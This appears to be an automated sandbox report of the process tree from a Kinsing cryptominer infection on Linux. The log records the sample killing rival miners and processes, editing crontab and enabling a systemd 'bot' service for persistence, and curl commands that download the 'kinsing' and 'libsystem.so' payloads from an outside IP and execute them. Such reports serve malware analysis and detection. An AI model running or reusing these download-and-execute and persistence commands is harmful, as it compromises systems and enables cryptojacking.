/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1425
-
-
/bin/grepgrep exe2⤵PID:1428
-
-
/bin/lsls -latrh /proc/zoneinfo2⤵PID:1427
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1430
-
-
/usr/bin/idid -u2⤵PID:1431
-
-
/usr/bin/sudosudo mkdir /etc/data2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:1432 -
/usr/sbin/sendmailsendmail -t3⤵PID:1435
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmNzI-0000N9-SE4⤵
- Reads CPU attributes
PID:1448
-
-
-
/usr/sbin/sendmailsendmail -t3⤵PID:1438
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmNzI-0000NC-SK4⤵
- Reads CPU attributes
PID:1449
-
-
-
/bin/mkdirmkdir /etc/data3⤵PID:1439
-
-
-
/usr/bin/idid -u2⤵PID:1440
-
-
/bin/unameuname -i2⤵
- Attempts to change immutable files
PID:1441
-
-
/bin/unameuname -m2⤵PID:1442
-
-
/bin/lsls -la /etc/data2⤵PID:1444
-
-
/bin/grepgrep -e /dev2⤵PID:1445
-
-
/bin/grepgrep -v grep2⤵PID:1446
-
-
/usr/bin/pkillpkill -f sshd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1447
-
-
/usr/bin/pkillpkill -f htop2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1450
-
-
/usr/bin/pkillpkill -f linuxsys2⤵
- Reads CPU attributes
PID:1452
-
-
/usr/bin/pkillpkill -f kthreaddo2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1453
-
-
/usr/bin/pkillpkill -f donkey2⤵
- Reads CPU attributes
PID:1454
-
-
/usr/bin/pkillpkill -f sysupdater2⤵
- Reads CPU attributes
PID:1455
-
-
/usr/bin/pkillpkill -f php-update.service2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1458
-
-
/usr/bin/pkillpkill -f update-setup2⤵
- Reads CPU attributes
PID:1459
-
-
/bin/grepgrep -v -2⤵PID:1464
-
-
/bin/grepgrep :14142⤵PID:1461
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1465
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1462
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1463
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1469
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1470
-
-
/bin/grepgrep -v grep2⤵PID:1468
-
-
/bin/grepgrep rtw88_pcied2⤵PID:1467
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1466
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1475
-
-
/bin/grepgrep stratum2⤵PID:1472
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1471
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1474
-
-
/bin/grepgrep -v grep2⤵PID:1473
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1479
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1480
-
-
/bin/grepgrep -v grep2⤵PID:1478
-
-
/bin/grepgrep Sofia2⤵PID:1477
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1476
-
-
/usr/bin/pkillpkill -f Sofia2⤵
- Reads CPU attributes
PID:1481
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1485
-
-
/bin/grepgrep -v grep2⤵PID:1484
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1486
-
-
/bin/grepgrep tracepath2⤵PID:1483
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1482
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1490
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1491
-
-
/bin/grepgrep -v grep2⤵PID:1489
-
-
/bin/grepgrep /dot2⤵PID:1488
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1487
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1496
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1495
-
-
/bin/grepgrep -v grep2⤵PID:1494
-
-
/bin/grepgrep "php-fpm pool www"2⤵PID:1493
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1492
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1501
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1500
-
-
/bin/grepgrep -v grep2⤵PID:1499
-
-
/bin/grepgrep "Cli start accept"2⤵PID:1498
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1497
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1506
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1505
-
-
/bin/grepgrep -v grep2⤵PID:1504
-
-
/bin/grepgrep "bash -k"2⤵PID:1503
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1502
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1511
-
-
/bin/grepgrep -v grep2⤵PID:1509
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1510
-
-
/bin/grepgrep perfctl2⤵PID:1508
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1507
-
-
/usr/bin/pkillpkill -f hezb2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1512
-
-
/usr/bin/pkillpkill -f /tmp/.out2⤵
- Reads CPU attributes
PID:1513
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1518
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1517
-
-
/bin/grepgrep -v grep2⤵PID:1516
-
-
/bin/grepgrep ./ll12⤵PID:1515
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1514
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1523
-
-
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"2⤵PID:1522
-
-
/bin/grepgrep -v grep2⤵PID:1521
-
-
/bin/grepgrep agetty2⤵PID:1520
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1519
-
-
/usr/bin/pkillpkill -f 42.112.28.2162⤵
- Reads CPU attributes
- Reads runtime system information
PID:1524
-
-
/bin/grepgrep -v -2⤵PID:1529
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1528
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1527
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1530
-
-
/bin/grepgrep 207.38.87.62⤵PID:1526
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1534
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1533
-
-
/bin/grepgrep -v -2⤵PID:1535
-
-
/bin/grepgrep 23.94.214.1192⤵PID:1532
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1536
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1540
-
-
/bin/grepgrep -v -2⤵PID:1541
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1539
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1542
-
-
/bin/grepgrep 127.0.0.1:520182⤵PID:1538
-
-
/bin/grepgrep 34.81.218.76:94862⤵PID:1544
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1545
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1546
-
-
/bin/grepgrep -v -2⤵PID:1547
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1548
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1552
-
-
/bin/grepgrep -v -2⤵PID:1553
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1551
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1554
-
-
/bin/grepgrep 42.112.28.216:94862⤵PID:1550
-
-
/usr/bin/pkillpkill -f .git/kthreaddw2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1555
-
-
/usr/bin/pkillpkill -f 80.211.206.1052⤵
- Reads CPU attributes
- Reads runtime system information
PID:1556
-
-
/usr/bin/pkillpkill -f 207.38.87.62⤵
- Reads CPU attributes
- Reads runtime system information
PID:1557
-
-
/usr/bin/pkillpkill -f p84442⤵
- Reads CPU attributes
PID:1558
-
-
/usr/bin/pkillpkill -f supportxmr2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1559
-
-
/usr/bin/pkillpkill -f monero2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1560
-
-
/usr/bin/pkillpkill -f kthreaddi2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1561
-
-
/usr/bin/pkillpkill -f srv002⤵
- Reads CPU attributes
- Reads runtime system information
PID:1562
-
-
/usr/bin/pkillpkill -f /tmp/.javae/javae2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1563
-
-
/usr/bin/pkillpkill -f .javae2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1564
-
-
/usr/bin/pkillpkill -f .syna2⤵
- Reads CPU attributes
PID:1565
-
-
/usr/bin/pkillpkill -f xmm2⤵
- Reads CPU attributes
PID:1566
-
-
/usr/bin/pkillpkill -f solr.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1567
-
-
/usr/bin/pkillpkill -f /tmp/.solr/solrd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1568
-
-
/usr/bin/pkillpkill -f /tmp/javac2⤵
- Reads CPU attributes
PID:1569
-
-
/usr/bin/pkillpkill -f /tmp/.go.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1570
-
-
/usr/bin/pkillpkill -f /tmp/.x/agetty2⤵
- Reads CPU attributes
PID:1571
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1572
-
-
/usr/bin/pkillpkill -f c3pool2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1573
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/gitag-ssh2⤵
- Reads CPU attributes
PID:1574
-
-
/usr/bin/pkillpkill -f /tmp/12⤵
- Reads CPU attributes
PID:1575
-
-
/usr/bin/pkillpkill -f /tmp/okk.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1576
-
-
/usr/bin/pkillpkill -f /tmp/gitaly2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1577
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1578
-
-
/usr/bin/pkillpkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB2⤵
- Reads CPU attributes
PID:1579
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/supervise2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1580
-
-
/usr/bin/pkillpkill -f /tmp/.ssh/redis.sh2⤵
- Reads CPU attributes
PID:1581
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1585
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1586
-
-
/bin/grepgrep -v grep2⤵PID:1584
-
-
/bin/grepgrep ./udp2⤵PID:1583
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1582
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/012⤵
- Attempts to change immutable files
PID:1587
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1589
-
-
/bin/catcat /tmp/.X11-unix/012⤵PID:1588
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/112⤵
- Attempts to change immutable files
PID:1590
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1592
-
-
/bin/catcat /tmp/.X11-unix/112⤵PID:1591
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/222⤵
- Attempts to change immutable files
PID:1593
-
-
/bin/catcat /tmp/.X11-unix/222⤵PID:1594
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1595
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.12⤵
- Attempts to change immutable files
PID:1596
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1598
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1597
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.22⤵
- Attempts to change immutable files
PID:1599
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1601
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1600
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.32⤵
- Attempts to change immutable files
PID:1602
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1604
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1603
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1605
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1606
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1607
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.02⤵
- Attempts to change immutable files
PID:1608
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1610
-
-
/bin/catcat /tmp/.pg_stat.02⤵PID:1609
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.12⤵
- Attempts to change immutable files
PID:1611
-
-
/bin/catcat /tmp/.pg_stat.12⤵PID:1612
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1613
-
-
/bin/sedsed -i "s/^0//" /data/./oka.pid2⤵
- Attempts to change immutable files
PID:1614
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1616
-
-
/bin/catcat /data/./oka.pid2⤵PID:1615
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/d2⤵
- Attempts to change immutable files
PID:1617
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1619
-
-
/bin/catcat /tmp/.ICE-unix/d2⤵PID:1618
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/m2⤵
- Attempts to change immutable files
PID:1620
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1622
-
-
/bin/catcat /tmp/.ICE-unix/m2⤵PID:1621
-
-
/usr/bin/pkillpkill -f zsvc2⤵
- Reads runtime system information
PID:1623
-
-
/usr/bin/pkillpkill -f pdefenderd2⤵
- Reads CPU attributes
PID:1624
-
-
/usr/bin/pkillpkill -f updatecheckerd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1625
-
-
/usr/bin/pkillpkill -f cruner2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1626
-
-
/usr/bin/pkillpkill -f dbused2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1627
-
-
/usr/bin/pkillpkill -f bashirc2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1628
-
-
/usr/bin/pkillpkill -f meminitsrv2⤵
- Reads CPU attributes
PID:1629
-
-
/bin/grepgrep -v grep2⤵PID:1632
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1634
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1633
-
-
/bin/grepgrep ./oka2⤵PID:1631
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1630
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1638
-
-
/bin/grepgrep -v grep2⤵PID:1637
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1639
-
-
/bin/grepgrep "postgres: autovacum"2⤵PID:1636
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1635
-
-
/bin/grepgrep -v bin2⤵PID:1642
-
-
/bin/grepgrep -v "\\["2⤵PID:1643
-
-
/bin/grepgrep -v "("2⤵PID:1644
-
-
/bin/grepgrep -v php-fpm2⤵PID:1645
-
-
/usr/bin/awkawk "length(\$1) == 8"2⤵PID:1641
-
-
/bin/grepgrep -v proxymap2⤵PID:1646
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
PID:1640
-
-
/bin/grepgrep -v postgres2⤵PID:1647
-
-
/bin/grepgrep -v postgrey2⤵PID:1648
-
-
/bin/grepgrep -v kinsing2⤵PID:1649
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1650
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1651
-
-
/bin/grepgrep -v bin2⤵PID:1654
-
-
/bin/grepgrep -v "\\["2⤵PID:1655
-
-
/bin/grepgrep -v "("2⤵PID:1656
-
-
/usr/bin/awkawk "length(\$1) == 16"2⤵PID:1653
-
-
/bin/grepgrep -v php-fpm2⤵PID:1657
-
-
/bin/grepgrep -v proxymap2⤵PID:1658
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1652
-
-
/bin/grepgrep -v postgres2⤵PID:1659
-
-
/bin/grepgrep -v postgrey2⤵PID:1660
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1661
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1662
-
-
/bin/grepgrep -v "\\["2⤵PID:1666
-
-
/bin/grepgrep -v bin2⤵PID:1665
-
-
/bin/grepgrep -v "("2⤵PID:1667
-
-
/usr/bin/awkawk "length(\$5) == 8"2⤵PID:1664
-
-
/bin/grepgrep -v php-fpm2⤵PID:1668
-
-
/bin/grepgrep -v proxymap2⤵PID:1669
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1663
-
-
/bin/grepgrep -v postgres2⤵PID:1670
-
-
/bin/grepgrep -v postgrey2⤵PID:1671
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1672
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1673
-
-
/bin/grepgrep /tmp/sscks2⤵PID:1676
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1677
-
-
/bin/grepgrep -v grep2⤵PID:1675
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1678
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1674
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1682
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1681
-
-
/bin/rmrm -rf /etc/data/kinsing2⤵PID:1683
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1684
-
-
/usr/bin/curlcurl -o /etc/data/kinsing http://194.38.22.120/kinsing2⤵PID:1685
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1686
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1690
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1689
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1694
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1693
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1695
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵PID:1696
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1697
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1701
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1700
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1702
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵PID:1703
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1704
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1708
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1707
-
-
/bin/rmrm -rf /tmp/kdevtmpfsi2⤵PID:1709
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1710
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1711
-
-
/etc/data/kinsing/etc/data/kinsing2⤵PID:1712
-
-
/usr/bin/idid -u2⤵PID:1714
-
-
/bin/systemctlsystemctl enable bot2⤵
- Enumerates kernel/hardware configuration
PID:1715
-
-
/bin/systemctlsystemctl start bot2⤵
- Enumerates kernel/hardware configuration
PID:1728
-
-
/bin/sedsed /base64/d2⤵PID:1733
-
-
/usr/bin/crontabcrontab -l2⤵PID:1732
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1734
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1737
-
-
/bin/sedsed /_cron/d2⤵PID:1736
-
-
/usr/bin/crontabcrontab -l2⤵PID:1735
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1740
-
-
/bin/sedsed /31.210.20.181/d2⤵PID:1739
-
-
/usr/bin/crontabcrontab -l2⤵PID:1738
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1743
-
-
/bin/sedsed /update.sh/d2⤵PID:1742
-
-
/usr/bin/crontabcrontab -l2⤵PID:1741
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1746
-
-
/bin/sedsed /logo4/d2⤵PID:1745
-
-
/usr/bin/crontabcrontab -l2⤵PID:1744
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1749
-
-
/bin/sedsed /logo9/d2⤵PID:1748
-
-
/usr/bin/crontabcrontab -l2⤵PID:1747
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1752
-
-
/bin/sedsed /logo0/d2⤵PID:1751
-
-
/usr/bin/crontabcrontab -l2⤵PID:1750
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1755
-
-
/bin/sedsed /logo/d2⤵PID:1754
-
-
/usr/bin/crontabcrontab -l2⤵PID:1753
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1758
-
-
/bin/sedsed /tor2web/d2⤵PID:1757
-
-
/usr/bin/crontabcrontab -l2⤵PID:1756
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1761
-
-
/bin/sedsed /jpg/d2⤵PID:1760
-
-
/usr/bin/crontabcrontab -l2⤵PID:1759
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1764
-
-
/bin/sedsed /png/d2⤵PID:1763
-
-
/usr/bin/crontabcrontab -l2⤵PID:1762
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1767
-
-
/bin/sedsed /tmp/d2⤵PID:1766
-
-
/usr/bin/crontabcrontab -l2⤵PID:1765
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1770
-
-
/bin/sedsed /zmreplchkr/d2⤵PID:1769
-
-
/usr/bin/crontabcrontab -l2⤵PID:1768
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1773
-
-
/bin/sedsed /aliyun.one/d2⤵PID:1772
-
-
/usr/bin/crontabcrontab -l2⤵PID:1771
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1776
-
-
/bin/sedsed /3.215.110.66.one/d2⤵PID:1775
-
-
/usr/bin/crontabcrontab -l2⤵PID:1774
-
-
/bin/sedsed /pastebin/d2⤵PID:1778
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1779
-
-
/usr/bin/crontabcrontab -l2⤵PID:1777
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1782
-
-
/bin/sedsed /onion/d2⤵PID:1781
-
-
/usr/bin/crontabcrontab -l2⤵PID:1780
-
-
/bin/sedsed /lsd.systemten.org/d2⤵PID:1784
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1785
-
-
/usr/bin/crontabcrontab -l2⤵PID:1783
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1788
-
-
/bin/sedsed /shuf/d2⤵PID:1787
-
-
/usr/bin/crontabcrontab -l2⤵PID:1786
-
-
/bin/sedsed /ash/d2⤵PID:1790
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1791
-
-
/usr/bin/crontabcrontab -l2⤵PID:1789
-
-
/bin/sedsed /mr.sh/d2⤵PID:1793
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1794
-
-
/usr/bin/crontabcrontab -l2⤵PID:1792
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1797
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1796
-
-
/usr/bin/crontabcrontab -l2⤵PID:1795
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1800
-
-
/bin/sedsed /localhost.xyz/d2⤵PID:1799
-
-
/usr/bin/crontabcrontab -l2⤵PID:1798
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1803
-
-
/bin/sedsed /45.137.151.106/d2⤵PID:1802
-
-
/usr/bin/crontabcrontab -l2⤵PID:1801
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1806
-
-
/bin/sedsed /111.90.159.106/d2⤵PID:1805
-
-
/usr/bin/crontabcrontab -l2⤵PID:1804
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1809
-
-
/usr/bin/crontabcrontab -l2⤵PID:1807
-
-
/bin/sedsed /github/d2⤵PID:1808
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1812
-
-
/bin/sedsed /bigd1ck.com/d2⤵PID:1811
-
-
/usr/bin/crontabcrontab -l2⤵PID:1810
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1815
-
-
/bin/sedsed /xmr.ipzse.com/d2⤵
- System Network Configuration Discovery
PID:1814
-
-
/usr/bin/crontabcrontab -l2⤵PID:1813
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1821
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1820
-
-
/usr/bin/crontabcrontab -l2⤵PID:1819
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1824
-
-
/bin/sedsed /91.241.19.134/d2⤵PID:1823
-
-
/usr/bin/crontabcrontab -l2⤵PID:1822
-
-
/bin/sedsed /122.51.164.83/d2⤵PID:1826
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1827
-
-
/usr/bin/crontabcrontab -l2⤵PID:1825
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1830
-
-
/bin/sedsed /185.191.32.198/d2⤵PID:1829
-
-
/usr/bin/crontabcrontab -l2⤵PID:1828
-
-
